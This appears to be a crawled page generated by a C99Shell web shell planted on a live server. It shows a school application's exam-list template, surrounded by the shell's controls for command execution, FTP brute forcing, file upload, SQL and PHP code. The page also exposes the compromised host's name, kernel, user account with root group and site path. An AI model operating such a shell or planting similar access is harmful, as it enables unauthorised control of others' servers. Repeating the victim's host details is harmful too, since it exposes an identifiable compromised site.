!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/teacher/examination/   drwxr-xr-x
Free 26.3 GB of 117.98 GB (22.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     exam_list.blade.php (1 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@if(count($exams) > 0)
<table id="basic-datatable" class="table eTable">
    <thead>
        <tr>
            <th>#</th>
            <th>{{ get_phrase('Exam') }}</th>
            <th>{{ get_phrase('Starting Time') }}</th>
            <th>{{ get_phrase('Ending Time') }}</th>
            <th>{{ get_phrase('Total Marks') }}</th>
        </tr>
    </thead>
    <tbody>
        @foreach($exams as $key => $exam)
            <tr>
                <td>{{ $exams->firstItem() + $key }}</td>
                <td>{{ $exam->name }}</td>
                <td>{{ date('d M Y - h:i A', $exam->starting_time) }}</td>
                <td>{{ date('d M Y - h:i A', $exam->ending_time) }}</td>
                <td>{{ $exam->total_marks }}</td>
            </tr>
        @endforeach
    </tbody>
</table>
{!! $exams->appends(request()->all())->links() !!}
@else
<div class="empty_box center">
    <img class="mb-3" width="150px" src="{{ asset('public/assets/images/empty_box.png') }}" />
    <br>
    {{ get_phrase('Data not found') }}
</div>
@endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--